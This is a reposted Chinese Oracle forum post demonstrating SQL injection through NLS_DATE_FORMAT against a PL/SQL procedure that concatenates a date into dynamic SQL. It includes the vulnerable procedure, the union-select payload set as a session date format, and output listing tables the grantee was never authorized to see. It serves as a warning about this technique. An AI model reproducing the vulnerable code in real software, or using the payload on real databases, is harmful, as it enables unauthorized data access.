[转帖]oracle 轻松小sql注入_MySQL, Oracle及数据库讨论区_Weblogic技术|Tuxedo技术|中间件技术|Oracle论坛|JAVA论坛|Linux/Unix技术|hadoop论坛

总帖数

每页帖数

1/1页

返回列表

发起投票

查看: 3507 | 回复: 0

主题： [转帖]oracle 轻松小sql注入

derek

注册用户

等级：中校
经验：1550
发帖：209
精华：0
注册：2011-7-21
状态：离线
发送短消息息给derek

加好友发送短消息息给derek

发消息

发表于：

2011-9-2 13:35:22 | [全部帖] [楼主帖]

楼主

天看tom的有提到一个很有趣的东东，只授权的procedure execute，别人就可以 sql注入，以后你可得小心了，下面请看我的试验

[oracle@aix ~]$ sqlplus anbob/anbob

SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011

Connected to:

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production

With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select * from v$version;

BANNER

----------------------------------------------------------------

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi

PL/SQL Release 10.2.0.4.0 - Production

CORE 10.2.0.4.0 Production

TNS for Linux: Version 10.2.0.4.0 - Production

NLSRTL Version 10.2.0.4.0 - Production

SQL> select * from all_users;

USERNAME USER_ID CREATED

------------------------------ ---------- -------------------

ZYY 1099 2011-08-30 11:41:03

GZPX_DB 1070 2011-08-30 11:41:01

GIAF 1069 2011-08-30 11:41:01

DEAN_TRAIN 1068 2011-08-30 11:41:01

...

75 rows selected.

SQL> select * from tab;

TNAME TABTYPE CLUSTERID

------------------------------ ------- ----------

TEST TABLE

TESTA TABLE

TESTB TABLE

TESTBLOB TABLE

TESTC TABLE

TESTIMG TABLE

TESTKDR TABLE

TESTXY TABLE

8 rows selected.

SQL> create or replace procedure badboy( p_date in date )

2 as

3 l_rec all_users%rowtype;

4 c sys_refcursor;

5 l_query long;

6 begin

7 l_query := 'select * from all_users where created = ''' ||p_date ||'''';

8 dbms_output.put_line( l_query );

9 open c for l_query;

10 for i in 1 .. 10

11 loop

12 fetch c into l_rec;

13 exit when c%notfound;

14 dbms_output.put_line( l_rec.username || '.....' );

15 end loop;

16 close c;

17 end;

18 /

Procedure created.

SQL> set serveroutput on;

SQL> exec badboy(sysdate);

select * from all_users where created = '2011-08-30 18:55:04'

PL/SQL procedure successfully completed.

SQL> grant execute on badboy to icme;

Grant succeeded.

SQL> conn icme/icme

Connected.

SQL> set serveroutput on

SQL> exec anbob.badboy(sysdate);

select * from all_users where created = '2011-08-30 18:57:44'

PL/SQL procedure successfully completed.

SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';

Session altered.

SQL> exec anbob.badboy(sysdate);

select * from all_users where created = ''union select tname,0,sysdate from tab--'

TEST.....

TESTA.....

TESTB.....

TESTBLOB.....

TESTC.....

TESTIMG.....

TESTKDR.....

TESTXY.....

PL/SQL procedure successfully completed.

呵，是不是很眼熟，这当然是anbob的表，这些表并没有授权给icme。同样也可以从all_column得到列，那样就可以得到表只的一部份数据了...

本版精华
热门帖子

操作引用/回复

总帖数

每页帖数

1/1页

返回列表

用户登录

Weblogic中间件技术论坛

Tuxedo中间件技术论坛

数据库论坛

Java论坛

Linux/unix论坛

网站地图